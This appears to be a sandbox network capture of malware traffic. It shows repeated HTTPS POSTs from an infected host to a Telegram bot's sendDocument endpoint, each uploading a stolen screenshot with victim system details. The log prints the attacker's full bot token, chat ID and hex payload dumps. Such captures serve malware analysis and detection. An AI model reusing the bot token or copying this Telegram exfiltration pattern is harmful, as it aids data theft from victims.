2025-01-10 15:57:21 UTC	7668	OUT	Data Raw: 54 95 d1 46 1e ce 0a 2f a1 c3 5e a2 ab 51 cd 75 2a 49 71 1d b4 56 b7 32 c9 72 1e 0d 42 49 23 8e 14 04 48 42 21 da cc 48 da 3d f0 7b d3 12 39 be c9 fd 9a 6f a1 13 b5 a9 90 db 05 93 7f da 0f ef 00 ce dd bf 77 0b f7 aa c1 b5 88 cc 65 2b f3 9e f4 c3 63 6c 51 94 c6 30 dd 6b 92 78 49 4a 4e 49 9e 95 3c c6 30 82 83 8d ec 85 b7 8e f0 ea 3a 5d d3 41 38 b7 75 b2 c4 be 59 d8 4e 13 3f 36 31 d6 aa db ce 4c 96 af 66 5e 2b 61 25 ca 83 70 e0 b4 57 25 4e cc b6 00 0a 70 a5 4e 07 39 ce 71 53 2e 99 6a aa 55 54 85 3d a9 4e 9d 6a 40 1e 5f 4a 99 60 e7 2e bd ff 00 12 e3 98 d3 8b 6d 47 7b 7e 0a c4 56 d0 4b 6a da 68 9d 6e ed ee e6 6b 88 8c 57 24 28 66 31 61 58 02 06 32 cc 06 72 7a 75 a4 81 a7 b1 8f 4e b7 bb 0d 6d 74 f2 5c 3c 62 61 b3 61 31 85 8d 9b 3f 74 6f 1c 13 e9 9a 98 69 b6 a3 Data Ascii: TF/^Qu*IqV2rBI#HB!H={9owe+clQ0kxIJNI<0:]A8uYN?61Lf^+a%pW%NpN9qS.jUT=Nj@_J`.mG{~VKjhnkW$(f1aX2rzuNmt\<baa1?toi
2025-01-10 15:57:21 UTC	50	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 37 30 62 32 33 63 39 33 32 36 32 33 2d 2d 0d 0a Data Ascii: -----------------------------8dd70b23c932623--
2025-01-10 15:57:22 UTC	1512	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 15:57:22 GMT Content-Type: application/json Content-Length: 1123 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":201792,"from":{"id":6224217116,"is_bot":true,"first_name":"chacha2023","username":"chacha1_bot"},"chat":{"id":1376739206,"first_name":"Chacha","last_name":"1","username":"chacha1000000","type":"private"},"date":1736524642,"document":{"file_name":"user-642294 2025-04-01 00-14-57.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAQMUQGeBQ2LnHOREovDEsOtjWXbVRpe9AAI4HQACuyoJUKAR1CleXznYAQAHbQADNgQ","file_unique_id":"AQADOB0AArsqCVBy","file_size":10551,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAQMUQGeBQ2LnHOREovDEsOtjWXbVRpe9AAI4HQACuyoJUKAR1CleXznYAQAHbQADNgQ","file_unique_id":"AQADOB0AArsqCVBy","file_size":10551,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAEDFEBngUNi5xzkRKLwxLDrY1l21UaXvQACOB0AArsqCVCgEdQpXl852DYE","file_unique_id":"AgADOB0AArsqCVA","file_size":57184},"caption":"New SC Recovered!\n\nTime: 04/01/2025 00:14:55\nUser Name: user/642294\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8 [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port
23	192.168.2.5	50008	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2025-01-10 15:57:23 UTC	262	OUT	POST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd73460fc7b16d Host: api.telegram.org Content-Length: 58021 Expect: 100-continue Connection: Keep-Alive
2025-01-10 15:57:24 UTC	25	IN	HTTP/1.1 100 Continue
2025-01-10 15:57:24 UTC	1024	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 37 33 34 36 30 66 63 37 62 31 36 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 37 36 37 33 39 32 30 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 37 33 34 36 30 66 63 37 62 31 36 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 34 2f 30 34 2f 32 30 32 35 20 30 36 3a 34 38 3a 31 30 0a 55 73 65 72 Data Ascii: -----------------------------8dd73460fc7b16dContent-Disposition: form-data; name="chat_id"1376739206-----------------------------8dd73460fc7b16dContent-Disposition: form-data; name="caption"New SC Recovered!Time: 04/04/2025 06:48:10User
2025-01-10 15:57:24 UTC	16355	OUT	Data Raw: 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 73 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14 Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFshU9oM4UofORx?"\|
2025-01-10 15:57:24 UTC	16355	OUT	Data Raw: 14 0c 28 a2 8a 00 28 a2 8a 00 4a 29 69 28 18 51 45 14 00 52 52 d1 4c 02 8a 4a 5a 00 29 29 68 a0 04 a2 8a 28 18 94 52 d1 40 09 45 29 a4 a6 01 45 14 50 30 a2 8a 28 01 28 a5 a4 a0 02 8a 28 a6 01 45 14 7e 14 0c 4a 29 68 a6 02 1a 29 69 28 01 29 72 47 42 68 c5 14 00 a4 83 d5 41 a4 28 a7 a1 c7 d6 8a 4a 2c 03 4c 6c 39 1c fd 29 b8 c7 51 52 e7 1e d4 bb b3 d4 03 45 87 72 0a 2a 52 a8 7d 45 27 94 7b 10 69 15 72 3a 4a 71 52 3a 82 29 29 95 71 28 a5 a2 80 12 93 b5 2d 14 00 98 a2 96 92 81 89 45 2d 14 00 94 94 b4 53 18 94 94 b4 52 01 b4 52 d1 45 87 71 a6 8a 76 3e b4 98 a2 c3 4c 6d 25 3a 92 81 dc 4f a5 25 3a 92 90 c6 fe 14 52 9a 43 45 86 25 2f 34 51 40 09 45 2d 14 00 94 51 45 3b 0c 4a 3b 52 e3 d6 93 14 00 74 a4 c5 2f e7 45 03 13 14 94 bd 28 c5 00 25 1c 52 d2 50 30 a4 a7 7e Data Ascii: ((J)i(QERRLJZ))h(R@E)EP0(((E~J)h)i()rGBhA(J,Ll9)QREr*R}E'{ir:JqR:))q(-E-SRREqv>Lm%:O%:RCE%/4Q@E-QE;J;Rt/E(%RP0~
2025-01-10 15:57:24 UTC	16355	OUT	Data Raw: 66 05 ca 28 a5 c5 00 25 25 3a 92 80 0a 31 4a 28 a0 04 a0 51 4b 48 04 a2 96 8c 50 02 51 4b 45 01 70 a3 14 b4 50 21 31 45 2e 28 c5 01 71 29 69 7f 0a 31 4a e1 71 2a 7b 5f f5 df f0 16 fe 55 0e 2a 6b 61 fb c3 fe eb 7f 2a 99 ec 26 ce 69 a9 87 de 9e fd 4d 30 d7 5f 43 a5 09 db 9a 43 4b de 90 d2 28 4a 28 ef 49 49 94 14 94 be d4 86 90 c2 92 96 93 de 90 07 e3 49 4b 49 ef 40 d0 94 52 d2 50 30 a4 fc 69 69 3f 1a 40 1f ce 8a 28 a0 67 53 49 4b 45 41 e1 09 4b 45 14 00 52 51 45 00 14 51 45 20 0a 28 a2 80 0a 29 68 a6 02 51 45 14 00 51 45 14 00 51 45 14 00 51 4b 45 00 25 14 51 40 05 14 51 48 02 8a 28 a6 01 45 14 50 01 45 14 50 02 51 4b 45 00 25 14 b4 50 31 28 a5 a2 80 12 8a 28 a0 02 92 96 8a 00 4a 29 68 a0 04 a3 b5 2d 14 00 94 52 d2 50 01 45 14 50 01 45 14 53 18 94 52 d2 50 Data Ascii: f(%%:1J(QKHPQKEpP!1E.(q)i1Jq{_Uka*&iM0_CCK(J(IIIKI@RP0ii?@(gSIKEAKERQEQE ()hQEQEQEQKE%Q@QH(EPEPQKE%P1((J)h-RPEPESRP
2025-01-10 15:57:24 UTC	7882	OUT	Data Raw: 32 26 d8 81 04 8e b9 04 8a b7 fd 9b 6b b7 68 8f 03 da 84 d3 ad 51 89 58 f0 4d 72 c7 07 25 64 de 9f f0 c7 6b cc a9 ea d4 75 ff 00 87 ff 00 30 48 99 3c 47 6f 02 17 10 d9 5d 45 6f 1e 7f 8b 0f cb 1f 72 72 6a 85 b3 a7 f6 28 17 11 5c c8 c6 fe 7d 86 39 02 6d f9 13 a8 2a 73 fa 56 9a da 42 b0 98 82 fc 87 a8 a6 c7 63 6f 13 6e 44 c1 ab fa a4 b4 d7 6f f3 33 59 8c 57 37 bb be df 75 88 6e 1c 09 a1 68 56 e5 2e e2 b4 b7 71 2f 98 0a 64 22 9f bb b7 3f f8 f5 45 ab 7c ef e5 40 af 1c 2b 10 b9 c7 ab c8 03 7e 40 61 47 d3 de af 45 6d 14 3b b6 2e 37 75 a4 4b 48 63 57 0a b8 0f d6 ae 38 56 ac ef b5 cc e5 8f 4f 9a cb 7b 7e 03 8e e3 ac ea 85 89 ff 00 8f 96 c6 7e b5 2d 47 04 11 c0 bb 63 18 15 25 74 51 87 b3 82 8b e8 70 d7 a8 aa d4 73 5d 4a 92 5c 47 6d 15 ad cc b2 5c 87 83 50 92 48 e3 Data Ascii: 2&khQXMr%dku0H<Go]Eorrj(\}9m*sVBconDo3YW7unhV.q/d"?E\|@+~@aGEm;.7uKHcW8VO{~~-Gc%tQps]J\Gm\PH
2025-01-10 15:57:24 UTC	50	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 37 33 34 36 30 66 63 37 62 31 36 64 2d 2d 0d 0a Data Ascii: -----------------------------8dd73460fc7b16d--
2025-01-10 15:57:24 UTC	1512	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 15:57:24 GMT Content-Type: application/json Content-Length: 1123 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":201793,"from":{"id":6224217116,"is_bot":true,"first_name":"chacha2023","username":"chacha1_bot"},"chat":{"id":1376739206,"first_name":"Chacha","last_name":"1","username":"chacha1000000","type":"private"},"date":1736524644,"document":{"file_name":"user-642294 2025-04-04 06-58-10.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAQMUQWeBQ2SXIByjutTGGCAjRel4VmkRAAI5HQACuyoJUKOY1qQyhWLzAQAHbQADNgQ","file_unique_id":"AQADOR0AArsqCVBy","file_size":10591,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAQMUQWeBQ2SXIByjutTGGCAjRel4VmkRAAI5HQACuyoJUKOY1qQyhWLzAQAHbQADNgQ","file_unique_id":"AQADOR0AArsqCVBy","file_size":10591,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAEDFEFngUNklyAco7rUxhggI0XpeFZpEQACOR0AArsqCVCjmNakMoVi8zYE","file_unique_id":"AgADOR0AArsqCVA","file_size":57398},"caption":"New SC Recovered!\n\nTime: 04/04/2025 06:48:10\nUser Name: user/642294\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8 [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port
24	192.168.2.5	50009	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2025-01-10 15:57:25 UTC	262	OUT	POST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd66ec79bef7a9 Host: api.telegram.org Content-Length: 59713 Expect: 100-continue Connection: Keep-Alive
2025-01-10 15:57:25 UTC	25	IN	HTTP/1.1 100 Continue
2025-01-10 15:57:25 UTC	1024	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 36 36 65 63 37 39 62 65 66 37 61 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 37 36 37 33 39 32 30 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 36 36 65 63 37 39 62 65 66 37 61 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 33 2f 31 39 2f 32 30 32 35 20 31 33 3a 30 36 3a 34 30 0a 55 73 65 72 Data Ascii: -----------------------------8dd66ec79bef7a9Content-Disposition: form-data; name="chat_id"1376739206-----------------------------8dd66ec79bef7a9Content-Disposition: form-data; name="caption"New SC Recovered!Time: 03/19/2025 13:06:40User
2025-01-10 15:57:25 UTC	16355	OUT	Data Raw: 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 5f b3 bf aa 8f ab 0a 3e ce fe a9 ff 00 7d 0a 96 4f bc 3e 83 f9 53 6b e8 f9 99 f2 7c a8 67 d9 df d5 3f ef a1 47 d9 df d5 3f ef a1 56 63 b5 95 d0 49 80 a8 7a 33 1e b5 2a db c4 bf 79 99 cf b7 03 fc fe 55 9c ab 28 ee cd 63 87 72 d9 14 7e ce fe a9 ff 00 Data Ascii: !1AQaq"2B#3Rbr$4%&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?_>}O>Sk\|g?G?VcIz3yU(cr~
2025-01-10 15:57:25 UTC	16355	OUT	Data Raw: 1c d5 b7 ba b7 9e 43 34 b7 22 25 b8 ba 6b 78 36 db 05 c9 18 ce e5 56 c2 8f 98 74 c9 a6 08 6e 55 21 51 24 25 a0 d9 e5 48 d0 a1 91 36 9c a8 0c 57 38 07 b6 71 db a5 36 de da e6 d2 32 b6 f3 a0 05 fc cf 9a 35 6d af fd e5 c8 3b 4f b8 c1 e0 7a 54 38 62 79 b9 ae 5a ab 83 e5 e5 b1 31 9d 16 cd 2e 4c aa 55 dc c2 06 de 4c a0 fc cb d7 a0 18 39 ef 91 c7 5c 4c 39 15 46 2b 3b 84 8d 62 33 ab 44 15 54 26 c1 80 14 92 31 c7 07 2c dc f5 39 3e b5 78 70 2b ae 87 b5 b3 f6 87 0e 27 d8 dd 7b 1d 85 a2 17 0b 7f 08 6f 2c 29 49 49 32 2e e5 18 8d 88 24 60 e7 04 67 a1 a2 a3 91 65 0e 92 42 ea 92 26 40 2c a1 86 08 c1 04 10 41 e0 9a ba d1 72 a6 d4 77 33 a1 28 c6 a4 65 2d 8a f1 dd 99 6f 2c 89 10 4c 92 d9 ce e6 68 50 2c 52 b2 ac 9c 85 c0 c6 30 07 20 72 33 8e e6 29 f5 3b 98 f4 05 2d 15 b3 5c Data Ascii: C4"%kx6VtnU!Q$%H6W8q625m;OzT8byZ1.LUL9\L9F+;b3DT&1,9>xp+'{o,)II2.$`geB&@,Arw3(e-o,LhP,R0 r3);-\
2025-01-10 15:57:25 UTC	16355	OUT	Data Raw: 29 c3 48 19 ca 8f a9 e9 de b2 64 bb 94 de 95 80 c9 0c 53 58 34 cd 10 62 46 5a dc b6 39 eb 82 78 cd 52 f2 6e 67 f0 f8 9e e1 2e 20 fb 35 b3 18 ae 87 11 48 37 7f ab 6f f6 89 24 0c 1f a8 3d 69 4b 11 1b e9 1d 3f e1 ff 00 c8 b8 60 a6 ed cd 37 7f f8 63 a4 9e ef 51 83 0f 71 2d e4 5b b8 0d 26 f5 cf e2 69 97 13 5e 34 08 d7 2d 72 61 62 0a b4 a1 b6 93 8e 30 4f 15 4b 53 c5 ae ab 3c 97 10 4f 69 6c fa 9c 4d 21 ba f9 96 e1 7e 6c 94 e0 61 46 72 7e f7 51 cf ad 35 59 6c ed 8d de ae 97 82 46 bb 45 91 99 bf 77 3a b6 ec b2 60 0d db 71 9c 86 23 9a ce 18 c4 f5 e5 fe b4 ff 00 32 e7 97 bd b9 db fe 9f f9 1a 54 aa ac ee a8 88 ce ed d1 55 49 27 f0 15 5c 3b c7 74 b6 52 05 33 44 a5 a6 75 6c 8c 9f ba 3f 2c 1f f8 15 4d 18 66 d4 20 55 49 24 dc 93 0d 91 fd e6 fd d3 70 38 3c fe 06 bb 9d 64 Data Ascii: )HdSX4bFZ9xRng. 5H7o$=iK?`7cQq-[&i^4-rab0OKS<OilM!~laFr~Q5YlFEw:`q#2TUI'\;tR3Dul?,Mf UI$p8<d
2025-01-10 15:57:25 UTC	9574	OUT	Data Raw: 4a 5a 4a 00 28 a2 8a 06 14 94 b4 94 00 51 45 14 0c 29 29 69 29 80 51 45 14 0c 4a 28 a2 80 0a 4a 5a 4a 00 28 a2 8a 06 25 14 51 40 c4 a2 8a 28 00 a2 8a 4a 06 14 94 b4 94 00 51 45 14 0c 29 28 a2 80 0a 4a 5a 4a 06 14 94 b4 94 c0 28 a2 8a 43 12 8a 28 a0 02 92 96 92 81 85 25 14 50 30 a4 a5 a4 a6 01 49 4b 49 40 c2 8a 28 a0 04 a2 8a 29 0c 29 29 69 29 8c 29 29 69 28 00 a4 a5 a4 a0 61 49 4b 45 00 25 14 51 40 c4 a2 8a 28 01 28 a2 8a 06 25 14 b4 94 0c 29 29 69 28 00 a2 8a 28 18 94 94 b4 73 40 c4 a2 8a 28 01 28 a5 a2 81 89 49 4b 45 00 25 14 51 40 c4 a2 8a 28 00 a3 8e f4 51 ed 40 c4 a2 8f 6a 28 00 a2 8a 28 01 28 a3 a7 34 50 33 aa a2 92 8a 93 c2 35 fc 37 ff 00 21 09 3f eb 91 fe 62 ba 0b 83 fb 96 fc 3f 9d 73 fe 1c ff 00 8f f9 3f eb 91 fe 62 b7 6e 5b 11 63 d4 e2 be 53 36 Data Ascii: JZJ(QE))i)QEJ(JZJ(%Q@(JQE)(JZJ(C(%P0IKI@()))i)))i(aIKE%Q@((%))i((s@((IKE%Q@(Q@j(((4P357!?b?s?bn[cS6
2025-01-10 15:57:25 UTC	50	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 36 36 65 63 37 39 62 65 66 37 61 39 2d 2d 0d 0a Data Ascii: -----------------------------8dd66ec79bef7a9--
2025-01-10 15:57:25 UTC	1512	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 15:57:25 GMT Content-Type: application/json Content-Length: 1123 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":201794,"from":{"id":6224217116,"is_bot":true,"first_name":"chacha2023","username":"chacha1_bot"},"chat":{"id":1376739206,"first_name":"Chacha","last_name":"1","username":"chacha1000000","type":"private"},"date":1736524645,"document":{"file_name":"user-642294 2025-03-19 13-46-39.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAQMUQmeBQ2XRx-A_5P0P3bYolvHbchMnAAI6HQACuyoJULMfWN9HWLfnAQAHbQADNgQ","file_unique_id":"AQADOh0AArsqCVBy","file_size":10803,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAQMUQmeBQ2XRx-A_5P0P3bYolvHbchMnAAI6HQACuyoJULMfWN9HWLfnAQAHbQADNgQ","file_unique_id":"AQADOh0AArsqCVBy","file_size":10803,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAEDFEJngUNl0cfgP-T9D922KJbx23ITJwACOh0AArsqCVCzH1jfR1i35zYE","file_unique_id":"AgADOh0AArsqCVA","file_size":59090},"caption":"New SC Recovered!\n\nTime: 03/19/2025 13:06:40\nUser Name: user/642294\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8 [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port
25	192.168.2.5	50010	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2025-01-10 15:57:29 UTC	262	OUT	POST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd6a2d3fc84416 Host: api.telegram.org Content-Length: 57807 Expect: 100-continue Connection: Keep-Alive
2025-01-10 15:57:30 UTC	25	IN	HTTP/1.1 100 Continue
2025-01-10 15:57:30 UTC	1024	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 36 61 32 64 33 66 63 38 34 34 31 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 37 36 37 33 39 32 30 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 36 61 32 64 33 66 63 38 34 34 31 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 33 2f 32 33 2f 32 30 32 35 20 31 36 3a 35 37 3a 35 32 0a 55 73 65 72 Data Ascii: -----------------------------8dd6a2d3fc84416Content-Disposition: form-data; name="chat_id"1376739206-----------------------------8dd6a2d3fc84416Content-Disposition: form-data; name="caption"New SC Recovered!Time: 03/23/2025 16:57:52User
2025-01-10 15:57:30 UTC	16355	OUT	Data Raw: 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 73 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14 Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFshU9oM4UofORx?"\|
2025-01-10 15:57:30 UTC	16355	OUT	Data Raw: 9d 14 0c 4c 52 52 f4 a3 14 00 94 71 4b 49 40 c2 92 9d f8 52 50 02 51 45 1d a9 0c 4a 28 fc 28 a0 04 14 94 ea 4a 43 12 8f ad 2d 25 00 1f 5a 28 a3 f1 a0 67 4b 45 14 56 47 88 14 51 48 cc ab d4 d4 ca 71 82 bc 9d 91 74 e9 4e ac b9 69 a6 df 96 a2 d1 4c f3 57 de 94 48 87 be 3e b5 8c 71 74 24 ec a6 8e c9 e5 98 ca 71 e6 95 27 6f 41 d4 52 d1 5d 07 00 94 51 45 00 14 51 41 20 0c 9e 05 00 b5 0a 2a 0f b5 db 8f f9 69 fa 1a 3e d7 6f ff 00 3d 3f 43 5c ff 00 5a a1 fc eb ef 47 7f f6 66 3b fe 7c cf ff 00 01 7f e4 4f 45 41 f6 bb 7f f9 e9 fa 1a 99 19 5d 43 29 c8 3d eb 48 56 a7 51 da 12 4f d1 98 d6 c1 e2 28 2e 6a d4 e5 15 e6 9a fc c5 a2 8a 2b 53 98 28 a2 8a 00 4a 29 68 a0 61 45 14 52 10 51 45 14 00 94 51 45 03 0a 28 a2 98 05 25 2d 25 00 14 51 45 03 0a 28 a2 80 0a 28 a2 80 0a 28 Data Ascii: LRRqKI@RPQEJ((JC-%Z(gKEVGQHqtNiLWH>qt$q'oAR]QEQA *i>o=?C\ZGf;\|OEA]C)=HVQO(.j+S(J)haERQEQE(%-%QE(((
2025-01-10 15:57:30 UTC	16355	OUT	Data Raw: 4b 49 40 05 14 51 40 05 14 51 4c 62 51 4b 49 40 05 14 51 40 05 14 51 40 05 25 2d 25 03 0a 28 a2 80 0a 28 a2 80 12 8a 28 a0 02 8a 28 a0 61 49 4b 45 00 25 14 51 40 05 14 51 4c 62 51 4b 45 00 25 14 b4 94 00 94 52 d2 50 01 45 14 53 18 52 52 d1 40 09 45 2d 25 00 14 51 4b 40 09 45 14 50 31 28 a5 a4 a0 02 8a 28 a6 01 45 14 50 31 28 a2 8a 00 28 a2 8a 00 4c 51 4b 45 30 12 8a 5c 51 40 c4 a2 96 8a 04 20 eb 5a 77 3f eb 8f d0 7f 2a cd 1d 6b 4e eb fd 71 fa 0f e5 59 4f e2 40 b7 21 a2 8a 28 34 0a 4a 5a 28 18 52 52 d1 40 09 45 14 50 01 45 14 b4 00 94 94 b4 50 01 45 2d 25 00 32 5f f8 f7 97 fd da ad 67 fe b1 be 95 66 6f f8 f7 97 fd da ad 65 fe b1 be 94 d6 cc 0b 94 b4 51 8a 40 25 14 b8 a3 14 82 e2 62 96 97 14 62 8b 85 c4 c5 14 b8 a3 14 5c 57 13 14 53 b0 7d 29 76 